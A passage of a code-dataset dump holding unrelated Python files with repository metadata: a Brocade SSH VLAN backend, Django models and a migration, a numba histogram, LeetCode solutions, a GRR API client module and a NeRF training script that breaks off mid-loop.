s_port, s_vlan = _portToInterfaceVLAN(source_nrm_port)
d_port, d_vlan = _portToInterfaceVLAN(dest_nrm_port)
assert s_vlan == d_vlan, 'Source and destination VLANs differ, unpossible!'
cmd_no_intf = COMMAND_NO_VLAN % { 'vlan' : s_vlan }
commands = [ cmd_no_intf ]
return commands
class SSHChannel(ssh.SSHChannel):
name = b'session'
def __init__(self, conn):
ssh.SSHChannel.__init__(self, conn=conn)
self.data = b''
self.wait_defer = None
self.wait_data = None
@defer.inlineCallbacks
def sendCommands(self, commands, enable_password):
LT = '\r' # line termination
try:
log.msg('Requesting shell for sending commands', debug=True, system=LOG_SYSTEM)
yield self.conn.sendRequest(self, 'shell', b'', wantReply=1)
d = self.waitForData(b'>')
self.write(COMMAND_PRIVILEGE % enable_password + LT)
yield d
log.msg('Entered privileged mode', debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(COMMAND_CONFIGURE + LT)
yield d
log.msg('Entered configure mode', debug=True, system=LOG_SYSTEM)
for cmd in commands:
log.msg('CMD> %s' % cmd, debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(cmd + LT)
yield d
# not quite sure how to handle failure here
log.msg('Commands send, sending end command.', debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(COMMAND_END + LT)
yield d
except Exception as e:
log.msg('Error sending commands: %s' % str(e))
raise e
log.msg('Commands successfully send', debug=True, system=LOG_SYSTEM)
self.sendEOF()
self.closeIt()
def waitForData(self, data):
self.wait_data = data
self.wait_defer = defer.Deferred()
return self.wait_defer
def dataReceived(self, data):
if len(data) == 0:
pass
else:
self.data += data
if self.wait_data and self.wait_data in self.data:
d = self.wait_defer
self.data = b''
self.wait_data = None
self.wait_defer = None
d.callback(self)
class BrocadeCommandSender:
def __init__(self, host, port, ssh_host_fingerprint, user, ssh_public_key_path, ssh_private_key_path, enable_password):
self.ssh_connection_creator = \
ssh.SSHConnectionCreator(host, port, [ ssh_host_fingerprint ], user, ssh_public_key_path, ssh_private_key_path)
self.enable_password = enable_password
@defer.inlineCallbacks
def sendCommands(self, commands):
# Open a connection for each request
# This is done due to the code being based on the Force10 backend
# It is currently unknown if the Brocade SSH implementation
# supports multiple ssh channels.
log.msg('Creating new SSH connection', debug=True, system=LOG_SYSTEM)
ssh_connection = yield self.ssh_connection_creator.getSSHConnection()
try:
channel = SSHChannel(conn=ssh_connection)
ssh_connection.openChannel(channel)
yield channel.channel_open
yield channel.sendCommands(commands, self.enable_password)
finally:
ssh_connection.transport.loseConnection()
class BrocadeConnectionManager:
def __init__(self, log_system, port_map, cfg):
self.log_system = log_system
self.port_map = port_map
host = cfg[config.BROCADE_HOST]
port = cfg.get(config.BROCADE_PORT, 22)
host_fingerprint = cfg[config.BROCADE_HOST_FINGERPRINT]
user = cfg[config.BROCADE_USER]
ssh_public_key = cfg[config.BROCADE_SSH_PUBLIC_KEY]
ssh_private_key = cfg[config.BROCADE_SSH_PRIVATE_KEY]
enable_password = cfg[config.BROCADE_ENABLE_PASSWORD]
self.command_sender = BrocadeCommandSender(host, port, host_fingerprint, user, ssh_public_key, ssh_private_key, enable_password)
def getResource(self, port, label):
assert label is not None and label.type_ == cnt.ETHERNET_VLAN, 'Label type must be ethernet-vlan'
return str(label.labelValue())
def getTarget(self, port, label):
assert label is not None and label.type_ == cnt.ETHERNET_VLAN, 'Label type must be ethernet-vlan'
return self.port_map[port] + '.' + label.labelValue()
def createConnectionId(self, source_target, dest_target):
return 'B-' + ''.join( [ random.choice(string.hexdigits[:16]) for _ in range(10) ] )
def canSwapLabel(self, label_type):
return False
def setupLink(self, connection_id, source_target, dest_target, bandwidth):
def linkUp(pt):
log.msg('Link %s -> %s up' % (source_target, dest_target), system=self.log_system)
return pt
commands = _createSetupCommands(source_target, dest_target)
d = self.command_sender.sendCommands(commands)
d.addCallback(linkUp)
return d
def teardownLink(self, connection_id, source_target, dest_target, bandwidth):
def linkDown(pt):
log.msg('Link %s -> %s down' % (source_target, dest_target), system=self.log_system)
return pt
commands = _createTeardownCommands(source_target, dest_target)
d = self.command_sender.sendCommands(commands)
d.addCallback(linkDown)
return d
def BrocadeBackend(network_name, nrm_ports, parent_requester, configuration):
name = 'Brocade %s' % network_name
nrm_map = dict( [ (p.name, p) for p in nrm_ports ] ) # for the generic backend
port_map = dict( [ (p.name, p.interface) for p in nrm_ports ] ) # for the nrm backend
cm = BrocadeConnectionManager(name, port_map, configuration)
return genericbackend.GenericBackend(network_name, nrm_map, cm, parent_requester, name)
| [
"[email protected]"
] | |
fdd4638884d947455012f888f979014d61edaff5 | 8e328e186da6c5bb12c35c72a967ab73be97d6c5 | /CSMWeb/models.py | 50a3d4cb6e83c4946df1b2340bafec3794e70140 | [] | no_license | PaloAltoCSM/CSM | 48bef57a7db0e623deec60d66e3e5dc4470354e9 | dd4aaeada040df8e199e9efcea779bef45bbbdb1 | refs/heads/master | 2021-01-01T16:30:04.794114 | 2015-08-15T01:46:29 | 2015-08-15T01:46:29 | 40,500,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
class Tag(models.Model):
text = models.CharField(max_length=100, primary_key=True)
def __str__(self):
return "Tag #%s" % (self.text)
class Project(models.Model):
name = models.CharField(max_length=100, primary_key=True)
title = models.CharField(max_length=200, blank=True)
description = models.TextField(blank=True)
members = models.ManyToManyField(User, related_name='projmembers')
followers = models.ManyToManyField(User, related_name='projfollowers')
# tags
tags = models.ManyToManyField(Tag)
def getDict(self):
return {'id': self.id, 'title': self.title, 'description': self.description}
def __unicode__(self):
return "Project #%s" % (self.name)
| [
"[email protected]"
] | |
5a7783237e226747e5fbd25cac84df4b45ef3159 | 4a74875c7366a19b7189fcb89fa0fa27abc4309e | /data_pipeline/processor/processor.py | b6493e1c2048911a74ea00ba33661a7c5fd2dae6 | [
"Apache-2.0"
] | permissive | saubury-iag/data_pipeline | d865d66d25eeb4ea6c6a655ae934bfe83c0efa06 | 4ad04198ed48c643045113c6e2c3e0848adbdec6 | refs/heads/master | 2021-07-23T08:43:46.754162 | 2017-11-01T05:05:23 | 2017-11-01T05:05:23 | 108,808,749 | 0 | 0 | null | 2017-10-30T06:06:41 | 2017-10-30T06:06:41 | null | UTF-8 | Python | false | false | 1,726 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
###############################################################################
# Module: cdc_processor
# Purpose: Processes CDCs polled from Kafka queue
#
# Notes:
#
###############################################################################
import logging
from abc import ABCMeta, abstractmethod
class Processor(object):
__metaclass__ = ABCMeta
def __init__(self):
self._set_logger()
def _set_logger(self):
self._logger = logging.getLogger(__name__)
def renew_workdirectory(self):
self._set_logger()
@abstractmethod
def deserialise(self):
pass
@abstractmethod
def process(self, stream_message):
"""Process CDC messsage into a statement
:param dict stream_message: Stream message payload polled from queue
:return: Statement object representing the statement to apply to target
:rtype: Statement
"""
pass
| [
"[email protected]"
] | |
244537803eabece33bf150b7a3e93cf37db117cb | b0eef0efd10556a4b054574fdd2d43124cb0856b | /npbench/benchmarks/azimint_hist/azimint_hist_numba_np.py | a59941dc12823543eda3a331f4260532d55b9226 | [
"BSD-3-Clause"
] | permissive | learning-chip/npbench | 140d38be2095b54393de6e0008264b54b7cf686b | f2f545afe3603d5c8f1771f26d660f25ce4a3cda | refs/heads/main | 2023-05-10T09:54:52.719759 | 2021-05-31T12:09:48 | 2021-05-31T12:09:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,291 | py | # Copyright 2014 Jérôme Kieffer et al.
# This is an open-access article distributed under the terms of the
# Creative Commons Attribution License, which permits unrestricted use,
# distribution, and reproduction in any medium, provided the original author
# and source are credited.
# http://creativecommons.org/licenses/by/3.0/
# Jérôme Kieffer and Giannis Ashiotis. Pyfai: a python library for
# high performance azimuthal integration on gpu, 2014. In Proceedings of the
# 7th European Conference on Python in Science (EuroSciPy 2014).
# BSD 2-Clause License
# Copyright (c) 2017, Numba
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import numba as nb
@nb.jit(nopython=True, parallel=True, fastmath=True)
def get_bin_edges_parallel(a, bins):
bin_edges = np.zeros((bins + 1, ), dtype=np.float64)
a_min = a.min()
a_max = a.max()
delta = (a_max - a_min) / bins
for i in range(bin_edges.shape[0]):
bin_edges[i] = a_min + i * delta
bin_edges[-1] = a_max # Avoid roundoff error on last point
return bin_edges
@nb.jit(nopython=True, fastmath=True)
def compute_bin(x, bin_edges):
# assuming uniform bins for now
n = bin_edges.shape[0] - 1
a_min = bin_edges[0]
a_max = bin_edges[-1]
# special case to mirror NumPy behavior for last bin
if x == a_max:
return n - 1 # a_max always in last bin
return int(n * (x - a_min) / (a_max - a_min))
@nb.jit(nopython=True, parallel=True, fastmath=True)
def histogram_parallel(a, bins, weights):
hist = np.zeros((bins, ), dtype=a.dtype)
bin_edges = get_bin_edges_parallel(a, bins)
for i in range(a.shape[0]):
bin = compute_bin(a[i], bin_edges)
hist[bin] += weights[i]
return hist, bin_edges
@nb.jit(nopython=True, parallel=True, fastmath=True)
def azimint_hist(data, radius, npt):
histu = np.histogram(radius, npt)[0]
# histw = np.histogram(radius, npt, weights=data)[0]
histw = histogram_parallel(radius, npt, weights=data)[0]
return histw / histu
| [
"[email protected]"
] | |
b07b16db3d774aac0bbdc84ffbfe276598532c9b | fc353b0433348ff58841cf32bf1f5e594e037513 | /leetcode/414.Third Maximum Number.py | ca03468944b1979e12857f95f61398921bb8c3d2 | [] | no_license | TrellixVulnTeam/Demo_933I | ce759ec52dd191f99b998862f4aba7971878ba37 | ab662060eb07a88a48c9832e09bf268517c1a3fa | refs/heads/master | 2023-04-27T16:55:29.627491 | 2021-05-07T05:38:58 | 2021-05-07T05:38:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,215 | py | # Given a non-empty array of integers, return the third maximum number in this a
# rray. If it does not exist, return the maximum number. The time complexity must
# be in O(n).
#
# Example 1:
#
# Input: [3, 2, 1]
#
# Output: 1
#
# Explanation: The third maximum is 1.
#
#
#
# Example 2:
#
# Input: [1, 2]
#
# Output: 2
#
# Explanation: The third maximum does not exist, so the maximum (2) is returned
# instead.
#
#
#
# Example 3:
#
# Input: [2, 2, 3, 1]
#
# Output: 1
#
# Explanation: Note that the third maximum here means the third maximum distinct
# number.
# Both numbers with value 2 are both considered as second maximum.
#
# Related Topics Array
# 👍 836 👎 1515
# region time
# 2020-12-30 23:36:42
# endregion
# leetcode submit region begin(Prohibit modification and deletion)
class Solution:
def thirdMax(self, nums) -> int:
nums = list(set(nums))
if len(nums) < 3:
return max(nums)
nums.sort(reverse=True)
return nums[2]
# leetcode submit region end(Prohibit modification and deletion)
if __name__ == '__main__':
# n = [3, 2, 1]
# n = [2, 2, 3, 1]
n = [1, 1, 2]
print(Solution().thirdMax(n))
| [
"[email protected]"
] | |
7516852dd574508330178cbc13a9ed763a228644 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /MtktG9Dz7z9vBCFYM_1.py | b19055d28322e4de6c3ee44a3d7684ed9c0daf4d | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | """
Write a function that takes an IP address and returns the domain name using
PTR DNS records.
### Example
get_domain("8.8.8.8") ➞ "dns.google"
get_domain("8.8.4.4") ➞ "dns.google"
### Notes
* You may want to import `socket`.
* Don't cheat and just print the domain name, you need to make a real DNS request.
* Return as a string.
"""
import socket as sk
def get_domain(ip_address):
return sk.getfqdn(sk.gethostbyaddr(ip_address)[0])
| [
"[email protected]"
] | |
95e1625f25d743050cb651088f93e69da0459865 | e0d404675839dc10bc1e995be4c35a69ab9133a5 | /api_client/python/grr_api_client/config.py | 18fe1aba06e22f8e98221caa6d7e3312da7a36a9 | [
"Apache-2.0"
] | permissive | feitianyiren/grr | 4afebc4a1912d46b4df4f1b4b0d25500505d05e5 | 9cc014f44ea9b21166e3b6815eb218d39f37fa07 | refs/heads/master | 2020-04-09T02:53:22.199635 | 2018-11-28T10:54:52 | 2018-11-28T10:54:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,804 | py | #!/usr/bin/env python
"""Functions and objects to access config-related GRR API methods."""
from __future__ import absolute_import
from __future__ import unicode_literals
from grr_api_client import utils
from grr_response_proto.api import config_pb2
class GrrBinaryBase(object):
"""Base class for GrrBinary references and objects."""
def __init__(self, binary_type=None, path=None, context=None):
super(GrrBinaryBase, self).__init__()
if not binary_type:
raise ValueError("binary_type can't be empty")
if not path:
raise ValueError("path can't be empty")
if not context:
raise ValueError("context can't be empty")
self.binary_type = binary_type
self.path = path
self._context = context
def Get(self):
args = config_pb2.ApiGetGrrBinaryArgs(type=self.binary_type, path=self.path)
data = self._context.SendRequest("GetGrrBinary", args)
return GrrBinary(data=data, context=self._context)
def GetBlob(self):
args = config_pb2.ApiGetGrrBinaryBlobArgs(
type=self.binary_type, path=self.path)
return self._context.SendStreamingRequest("GetGrrBinaryBlob", args)
class GrrBinaryRef(GrrBinaryBase):
"""GRR binary reference (points to one, but has no data)."""
class GrrBinary(GrrBinaryBase):
"""GRR binary object with fetched data."""
def __init__(self, data=None, context=None):
if data is None:
raise ValueError("data can't be None")
super(GrrBinary, self).__init__(
binary_type=data.type, path=data.path, context=context)
self.data = data
def ListGrrBinaries(context=None):
"""Lists all registered Grr binaries."""
items = context.SendIteratorRequest("ListGrrBinaries", None)
return utils.MapItemsIterator(
lambda data: GrrBinary(data=data, context=context), items)
| [
"[email protected]"
] | |
384f2c32d83751bbaee4e8bf82c84cbdb8560799 | db1592ee9ba472d2a2f94056ac32b255deb69ecd | /hog/api/migrations/0007_auto_20190618_1648.py | 03bfdfd56703771d235c0fe8b69f4fc89eb337bf | [] | no_license | tech4nature/hogapp | 3fadcad8353dd2cecdc97eff87d0f196e144a2f5 | 24d50c9756853534e1dafdccbf3609fd512f253a | refs/heads/main | 2023-03-07T00:45:53.100651 | 2022-07-09T13:00:16 | 2022-07-09T13:00:16 | 175,845,744 | 1 | 0 | null | 2023-02-15T19:58:09 | 2019-03-15T15:27:33 | Python | UTF-8 | Python | false | false | 1,182 | py | # Generated by Django 2.1.7 on 2019-06-18 16:48
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('api', '0006_location_coords'),
]
operations = [
migrations.AddField(
model_name='measurement',
name='video_poster',
field=models.FileField(blank=True, null=True, upload_to='posters'),
),
migrations.AlterField(
model_name='hog',
name='code',
field=models.CharField(max_length=80, primary_key=True, serialize=False, validators=[django.core.validators.RegexValidator(re.compile('^[-a-zA-Z0-9_]+\\Z'), "Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens.", 'invalid')]),
),
migrations.AlterField(
model_name='location',
name='code',
field=models.CharField(max_length=80, primary_key=True, serialize=False, validators=[django.core.validators.RegexValidator(re.compile('^[-a-zA-Z0-9_]+\\Z'), "Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens.", 'invalid')]),
),
]
| [
"[email protected]"
] | |
ed2d8e730e1f68799c443568132b6b04df8ed6f2 | 9f884a3584eef771f8c010e296c5d763098be243 | /povary/apps/recipes/urls.py | 8e69a1a748b52fe7ca90910cd8edfb48e5a05e85 | [
"BSD-3-Clause"
] | permissive | TorinAsakura/cooking | fc8658ce2ac21c2e00dc307399a5fa24971a20c1 | cf0c78f613fa9ce0fcd4ec7a397ab880d9dd631a | refs/heads/master | 2023-01-24T13:07:38.529811 | 2020-12-08T22:14:33 | 2020-12-08T22:14:33 | 319,773,012 | 0 | 0 | BSD-3-Clause | 2020-12-08T22:14:34 | 2020-12-08T22:08:34 | null | UTF-8 | Python | false | false | 1,408 | py | # -*- coding: utf-8 -*-
from django.conf.urls import patterns, url
from recipes.views import RecipeWizard
from recipes.forms import RecipeFormStep1, RecipeFormStep2, RecipeFormStep3, IngredientForm
from django.forms.formsets import formset_factory
FORMS = [("first", RecipeFormStep1),
("second", formset_factory(IngredientForm)),
("third", RecipeFormStep3)]
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'povary.views.home', name='home'),
# url(r'^povary/', include('povary.foo.urls')),
url(r'add_recipe_to_box/(?P<recipe_slug>.*)/$', 'recipes.views.add_recipe_to_box', name='add_recipe_to_box'),
url(r'^$', 'recipes.views.recipe_list', name='recipe_list'),
url(r'^add/$', RecipeWizard.as_view(FORMS), name="recipe-add"),
url(r'^cakes/$', 'recipes.views.cake_recipe_list', name='cake_recipe_list'),
# url(r'^categories/(?P<category_slug>.*)/(?P<subcategory_slug>.*)/$',
# 'recipes.views.subcategory_details',
# name='subcategory_details'),
# url(r'^categories/(?P<category_slug>.*)/$', 'recipes.views.category_details', name='category_details'),
url(r'^ajax/(?P<recipe_slug>.*)/set_portion/$', 'recipes.views.set_portion', name='set_portion'),
url(r'^ajax/(?P<recipe_slug>.*)/wish/$', 'recipes.views.wish', name='wish'),
url(r'^(?P<recipe_slug>.*)/$', 'recipes.views.recipe_details', name='recipe_details'),
)
| [
"[email protected]"
] | |
9068990897aab8e31bc3528c0d1e5e71e9ac3716 | ded13e921c8365c6113911a5834969ec3d33f989 | /190/Reverse Bits.py | daf8020e90da61121938b47c386e6a71c42cebc4 | [] | no_license | ArrayZoneYour/LeetCode | b7b785ef0907640623e5ab8eec1b8b0a9d0024d8 | d09f56d4fef859ca4749dc753d869828f5de901f | refs/heads/master | 2021-04-26T23:03:10.026205 | 2018-05-09T15:49:08 | 2018-05-09T15:49:08 | 123,922,098 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 542 | py | # /usr/bin/python
# coding: utf-8
class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
bit_list = []
for i in range(32):
if n == 0:
bit_list.append(0)
else:
bit_list.append(n % 2)
n //= 2
size = 1
result = 0
for bit in bit_list[::-1]:
if bit != 0:
result += bit * size
size *= 2
return result
print(Solution().reverseBits(43261596))
| [
"[email protected]"
] | |
f88454fa9aec4c56926c2ca6e93a4e29b4d5ed11 | 2c32cf726e111b8625265c458feeaea436652e83 | /pramp-condility-3month/mid-ll-03.py | 1e8be57a8c2ad51d2eaf8186bda15d8dd284e8ed | [] | no_license | minhthe/practice-algorithms-and-data-structures | 6fa3bf98e8e2fe98f4e32419fb797b1df4400364 | 488a82dd3a0c797859a6c9e1195d6d579d676073 | refs/heads/master | 2021-05-16T23:01:20.026475 | 2020-09-23T04:17:13 | 2020-09-23T04:17:13 | 250,505,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | '''https://leetcode.com/problems/middle-of-the-linked-list/'''
class Solution:
def middleNode(self, head: ListNode) -> ListNode:
slow = head
fast = head
while slow.next :
slow = slow.next
fast = fast.next.next
if not fast or not fast.next: return slow
return slow | [
"[email protected]"
] | |
1bfe256e98b3819a009084e61cbab623b1b98742 | 2a68b03c923119cc747c4ffcc244477be35134bb | /Algorithm/BFS/cutOffTreesForGolf.py | 2a98a13b8ff88d702b43e4e35845dcc69aa477f3 | [] | no_license | QitaoXu/Lintcode | 0bce9ae15fdd4af1cac376c0bea4465ae5ea6747 | fe411a0590ada6a1a6ae1166c86c585416ac8cda | refs/heads/master | 2020-04-24T20:53:27.258876 | 2019-09-24T23:54:59 | 2019-09-24T23:54:59 | 172,259,064 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,554 | py | from collections import deque
DIRECTIONS = [(-1, 0), (1, 0), (0, 1), (0, - 1)]
class Node:
def __init__(self, x, y, h):
self.x = x
self.y = y
self.h = h
def __lt__(self, other):
return self.h < other.h
class Solution:
"""
@param forest: a list of integers
@return: return a integer
"""
def cutOffTree(self, forest):
# write your code here
if not forest or not forest[0]:
return 0
m, n = len(forest), len(forest[0])
trees = []
for i in range(m):
for j in range(n):
if forest[i][j] > 1:
trees.append(Node(i, j, forest[i][j]))
trees.sort()
total = 0
start = Node(0, 0, forest[0][0])
while trees:
tree = trees[0]
del trees[0]
step = self.minStep(forest, start, tree, m, n)
if step < 0:
return -1
total += step
start = tree
return total
def minStep(self, forest, start, tree, m, n):
queue = deque()
seen = set()
queue.append(start)
seen.add((start.x, start.y))
step = -1
while queue:
size = len(queue)
step += 1
for _ in range(size):
node = queue.popleft()
if node.x == tree.x and node.y == tree.y:
return step
for dx, dy in DIRECTIONS:
nx, ny = node.x + dx, node.y + dy
if not self.is_valid(forest, nx, ny):
continue
if (nx, ny) in seen:
continue
queue.append(Node(nx, ny, forest[nx][ny]))
seen.add((nx, ny))
return -1
def is_valid(self, forest, x, y):
m, n = len(forest), len(forest[0])
if x < 0 or x >= m or y < 0 or y >= n:
return False
if forest[x][y] == 0:
return False
return True
| [
"[email protected]"
] | |
c0a3e051bbc2c684475bd3bf28a5112cb6f2f3d3 | 4ccd7bab3b9491426300d9714330ad58f65fab68 | /Train/train.py | f9f4c923c120389b2dc08391d660292b893e70f9 | [] | no_license | jcn16/nert | 48ebcb3fb64bb2913ab20f85f9b8ab3ae00f4731 | 3b6e9d85e77077d1ad3b669fe88799d6a19e6d99 | refs/heads/main | 2023-06-06T11:31:21.520886 | 2021-06-20T08:33:36 | 2021-06-20T08:33:36 | 378,593,994 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,813 | py | import os, sys
from opt import get_opts
from tqdm import tqdm
from torch.utils.data import DataLoader
from datasets import dataset_dict
# models
from models.nerf import Embedding, NeRF,NeRF_sigma,NeRF_albedo
from models.rendering_part import render_rays
from losses import MSELoss
from collections import defaultdict
# metrics
from metrics import *
from utils import visualize_depth
from termcolor import colored
from tensorboardX import SummaryWriter
from checkpoints import CheckpointIO
os.environ['CUDA_VISIBLE_DEVICES']='0,1'
hparams = get_opts()
#Loading Dataset
print(colored('Loading Dataset','red'))
dataset = dataset_dict[hparams.dataset_name]
kwargs = {'root_dir': hparams.root_dir,
'img_wh': tuple(hparams.img_wh)}
train_dataset = dataset(split='train', **kwargs)
val_dataset = dataset(split='val', **kwargs)
train_data_loader=DataLoader(train_dataset,
shuffle=True,
num_workers=4,
batch_size=hparams.batch_size,
pin_memory=True)
val_data_loader=DataLoader(val_dataset,
shuffle=False,
num_workers=4,
batch_size=1, # validate one image (H*W rays) at a time
pin_memory=True)
val_iter=iter(val_data_loader)
# Loading Loss
mse_loss=MSELoss()
#Loading Network
print(colored('Loading Network','red'))
corase_Nerf_sigma=NeRF_sigma().cuda()
corase_Nerf_sigma=torch.nn.DataParallel(corase_Nerf_sigma)
corase_Nerf_albedo=NeRF_albedo().cuda()
corase_Nerf_albedo=torch.nn.DataParallel(corase_Nerf_albedo)
fine_Nerf_sigma=NeRF_sigma().cuda()
fine_Nerf_sigma=torch.nn.DataParallel(fine_Nerf_sigma)
fine_Nerf_albedo=NeRF_albedo().cuda()
fine_Nerf_albedo=torch.nn.DataParallel(fine_Nerf_albedo)
try:
corase_Nerf_sigma.load_state_dict(torch.load('/home/jcn/桌面/Nerf/nerf_my/checkpoints/corase_sigma_0.pt'))
corase_Nerf_albedo.load_state_dict(torch.load('/home/jcn/桌面/Nerf/nerf_my/checkpoints/corase_albedo_0.pt'))
fine_Nerf_sigma.load_state_dict(torch.load('/home/jcn/桌面/Nerf/nerf_my/checkpoints/fine_sigma_0.pt'))
fine_Nerf_albedo.load_state_dict(torch.load('/home/jcn/桌面/Nerf/nerf_my/checkpoints/fine_albedo_0.pt'))
print('Continue Training ...')
except:
print('Start New Trainging ..')
embedding_xyz = Embedding(3, 10).cuda() # 10 is the default number
embedding_xyz= torch.nn.DataParallel(embedding_xyz)
embedding_dir = Embedding(3, 4).cuda() # 4 is the default number
embedding_dir=torch.nn.DataParallel(embedding_dir)
o_shared=torch.optim.Adam([
{
"params": corase_Nerf_sigma.parameters(),
"lr": 5e-4,
},
{
"params": corase_Nerf_albedo.parameters(),
"lr": 5e-4,
},
{
"params": fine_Nerf_sigma.parameters(),
"lr": 5e-4,
},
{
"params": fine_Nerf_albedo.parameters(),
"lr": 5e-4,
}
])
#Loading Checkpoints
if not os.path.exists(hparams.check_dir):
os.makedirs(hparams.check_dir)
logger=SummaryWriter(os.path.join(hparams.check_dir, 'logs'))
checkpoints_io=CheckpointIO(hparams.check_dir,
corase_Nerf_sigma=corase_Nerf_sigma,
corase_Nerf_albedo=corase_Nerf_albedo,
fine_Nerf_sigma=fine_Nerf_sigma,
fine_Nerf_albedo=fine_Nerf_albedo,
optimizer=o_shared)
try:
load_dict=checkpoints_io.load('model_latest.pt')
except FileExistsError:
load_dict=dict()
start_epoch=load_dict.get('epoch_it',0)
it=load_dict.get('it',0)
#Start Training
print(colored('Start Training','blue'))
print('total data=',len(train_dataset))
iter_number = int(len(train_dataset) / hparams.batch_size)
print('val data per ', iter_number)
for epoch in range(100):
epoch=epoch+start_epoch
pbar = tqdm(total=iter_number)
#all losse
print('New Epoch!')
for batch in train_data_loader:
pbar.update(1)
it += 1
corase_Nerf_sigma.train()
corase_Nerf_albedo.train()
fine_Nerf_sigma.train()
fine_Nerf_albedo.train()
rays=batch['rays'].cuda()
rgbs=batch['rgbs'].cuda()
embeddings = [embedding_xyz, embedding_dir]
results=render_rays(corase_Nerf_sigma,corase_Nerf_albedo,fine_Nerf_sigma,fine_Nerf_albedo,
embeddings,rays,
hparams.N_samples,
hparams.use_disp,
hparams.perturb,
hparams.noise_std,
hparams.N_importance,
hparams.chunk, # chunk size is effective in val mode
train_dataset.white_back
)
loss=mse_loss(results,rgbs)
loss=loss.mean()
psnr_=psnr(results['rgb_fine'],rgbs)
psnr_=psnr_.mean()
o_shared.zero_grad()
loss.backward()
o_shared.step()
logger.add_scalar('train/loss', loss, it)
logger.add_scalar('train/psnr', psnr_, it)
if it%hparams.step==0:
print("save models")
base_path = hparams.check_dir
model_path = os.path.join(base_path, 'corase_sigma_%d.pt' % epoch)
torch.save(corase_Nerf_sigma.state_dict(), model_path)
model_path = os.path.join(base_path, 'corase_albedo_%d.pt' % epoch)
torch.save(corase_Nerf_albedo.state_dict(), model_path)
model_path = os.path.join(base_path, 'fine_sigma_%d.pt' % epoch)
torch.save(fine_Nerf_sigma.state_dict(), model_path)
model_path = os.path.join(base_path, 'fine_albedo_%d.pt' % epoch)
torch.save(fine_Nerf_albedo.state_dict(), model_path)
for n in range(8):
try:
val_batch = val_iter.__next__()
except StopIteration:
val_iter = iter(val_data_loader)
val_batch = val_iter.__next__()
with torch.no_grad():
corase_Nerf_sigma.eval()
corase_Nerf_albedo.eval()
fine_Nerf_sigma.eval()
fine_Nerf_albedo.eval()
rays = val_batch['rays'].cuda()
rays =rays.squeeze()
rgbs = val_batch['rgbs'].cuda()
rgbs=rgbs.squeeze()
B,_=rays.shape
embeddings = [embedding_xyz, embedding_dir]
results = defaultdict(list)
for i in range(0, B, hparams.chunk):
rendered_ray_chunks = \
render_rays(corase_Nerf_sigma, corase_Nerf_albedo, fine_Nerf_sigma, fine_Nerf_albedo,
embeddings, rays[i:i+hparams.chunk],
hparams.N_samples,
hparams.use_disp,
hparams.perturb,
hparams.noise_std,
hparams.N_importance,
hparams.chunk, # chunk size is effective in val mode
train_dataset.white_back
)
for k, v in rendered_ray_chunks.items():
results[k] += [v]
for k, v in results.items():
results[k] = torch.cat(v, 0)
val_loss=mse_loss(results,rgbs)
val_loss=val_loss.mean()
psnr_ = psnr(results['rgb_fine'], rgbs)
psnr_ = psnr_.mean()
W, H = hparams.img_wh
img = results['rgb_fine'].view(H, W, 3).cpu()
img = img.permute(2, 0, 1) # (3, H, W)
img_gt = rgbs.view(H, W, 3).permute(2, 0, 1).cpu() # (3, H, W)
depth = visualize_depth(results['depth_fine'].view(H, W)) # (3, H, W)
show_img = torch.cat([img_gt,img,depth], 2)
